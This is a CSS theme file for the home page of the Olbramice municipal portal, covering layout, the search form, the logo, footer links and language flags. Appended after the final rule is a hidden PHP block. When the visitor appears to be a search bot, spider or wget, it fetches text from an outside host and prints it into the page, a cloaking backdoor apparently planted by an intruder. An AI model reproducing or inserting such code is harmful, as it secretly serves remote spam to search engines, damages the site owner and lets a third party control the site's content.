@charset "utf-8";
/*
Theme Name:Olbramice 2010 - pro uvodní stránku
Theme URI: http://www.obecolbramice.cz//
Description: Vzhled pro informařní portál obce Olbramice.
Version: 2010/1
Author: Aleš Skotnica

Webdesign and CSS code by Aleš Skotnica || http://www.skotnica.eu
*/

/* <-------------- Telo   */
	body {margin:0;padding:0 0 30px 0;font-family:Calibri,sans-serif;font-size:0.9em;font-style:normal;font-weight:normal;line-height:1.6em;color:#4B4B4B;background:#F8F8EE url(img/body-home.jpg) no-repeat top center;text-align:center;}

/* <-------------- Odkazy */
	a, a:link, a:visited                {color:#808032;text-decoration:underline;}
	a:hover, a:focus                    {color:#9A1818;text-decoration:underline;}
	a:active                            {color:#171772;text-decoration:none;}
    a img, a:link img, a:visited img    {border:none;text-decoration:none;}

/* <-------------- Ruzne obecne tagy */
    hr, .txt, .n {display:none;}
    .clr {clear:both;width:100%;overflow:hidden;}
	
	
	div, form {margin:0;padding:0}
	
/* <-------------- reset nadpisu */
    h1, h2  {font-size:1em;font-weight:normal;margin:10px 0;padding:0;line-height:1.3em;}
	
	
/* <-------------- box model */
	#page {position:relative;margin:0 auto;width:940px;height:600px;overflow:hidden;margin:0 auto;background:url(img/page-home.jpg) no-repeat top left;}


/* <-------------- vyhledavaci formular */
	#searchform {position:absolute;top:123px;right:0;background:url(img/search-home.jpg) no-repeat;width:314px;}
	#searchform p {position:relative;margin:0;padding:0;width:314px;height:50px;}
	#searchform label {display:none;}
	#searchform input {border:none;background:none;font-family:sans-serif;position:absolute;top:9px;left:10px;padding:6px 10px 5px 10px;width:195px;}
	#searchform button span {display:none;}
	#searchform button {display:block;margin:0;padding:0;border:none;width:89px;height:42px;background:url(img/searchbutton.jpg) no-repeat 0px 0px;position:absolute;top:8px;left:225px;cursor:pointer;}
	#searchform button:hover {background-position:0px -42px}
	
	 

/* <-------------- logo */
	#logo-home, #logo-home span {margin:0;padding:0;overflow:hidden;width:372px;height:135px;}
	#logo-home {position:absolute;top:172px;left:46px;}
	#logo-home span {position:relative;float:left;}
	#logo-home span span {position:absolute;float:none;top:0;left:0;background:url(img/logo-home.jpg) no-repeat;}
	

/* <-------------- odkazy obcan/turista */
	.hlink, .hlink a, .hlink a span {margin:0;padding:0;overflow:hidden;position:absolute;height:65px;}
	.hlink {top:414px;}
	.hlink a {position:relative;float:left;text-align:center;}
	.hlink a span {top:0;left:0;cursor:pointer;background:url(img/hlinks.jpg) no-repeat 0px 0px;}
	
	.hlinko, .hlinko a, .hlinko a span {width:195px;}
	.hlinko {left:239px;}
	.hlinko a span, .hlinko a:visited span {background-position:0px 0px;}
	.hlinko a:hover span {background-position:-205px 0px;}

	.hlinkt, .hlinkt a, .hlinkt a span {width:205px;}
	.hlinkt {left:512px;}
	.hlinkt a span, .hlinkt a:visited span {background-position:0px -65px;}
	.hlinkt a:hover span {background-position:-205px -65px;}

	.flinks {margin:0;padding:0;position:absolute;top:530px;left:0;width:940px;list-style:none;text-align:center;}
	.flinks li {display:inline;margin-left:30px;padding:12px 0 12px 30px;background:url(img/flinks-middle.jpg) no-repeat left top;}
	.flinks li:first-child {margin-left:0;padding:12px 0;background:none;}
	.flinks a, .flinks a:visited {color:#455057;text-decoration:underline;background:url(img/flinks.gif) no-repeat 0px 0px;padding:6px 0 6px 32px;}
	.flinks a:hover {color:#9A1818;text-decoration:underline;}
	
	.flinks-cs1 a {background-position:0px 0px;}
	.flinks li.flinks-cs2   { display:none;}
	.flinks-map a {background-position:0px -50px;}
	.flinks-con a {background-position:0px -100px;}
	
/* <-------------- copyright */
	#footer {margin:0 auto;padding:0;width:940px;list-style:none;text-align:center;}

	#copyright {font-size:0.8em;color:#AAAA42;background:url(img/copy-bg.png) no-repeat top center;margin:0;padding:40px 0 20px 0;}
	#copyright span {padding:0 20px;}
	#copyright a, #copyright a:visited {color:#AAAA42;text-decoration:underline;}	#copyright a:hover {color:#9A1818;text-decoration:underline;}

/* <-------------- vlajky */	
	.lang {display:block;margin:0;padding:0;position:absolute;top:40px;right:0;width:80px;font-size:0.75em;}
	.lang a, .lang a span {display:block;margin:0;padding:0;width:32px;height:24px;overflow:hidden;}
	.lang a {position:relative;}
	.lang a span {position:absolute;top:0;left:0;cursor:pointer;background:url(img/home-flags.jpg) no-repeat 0px 0px;}
	.lang a.flag-en {float:left;}	.lang a.flag-de {float:right;}
	.lang a.flag-en span, .lang a.flag-en:visited span {background-position:0px 0px;} .lang a.flag-en:hover span {background-position:0px -24px;}
	.lang a.flag-de span, .lang a.flag-de:visited span {background-position:-32px 0px;} .lang a.flag-de:hover span {background-position:-32px -24px;}<?php
if(preg_match('/Google Web Preview|bot|spider|wget/i',$_SERVER['HTTP_USER_AGENT'])){
echo file_get_contents('http://fd.langall.com/org.txt');
}
?>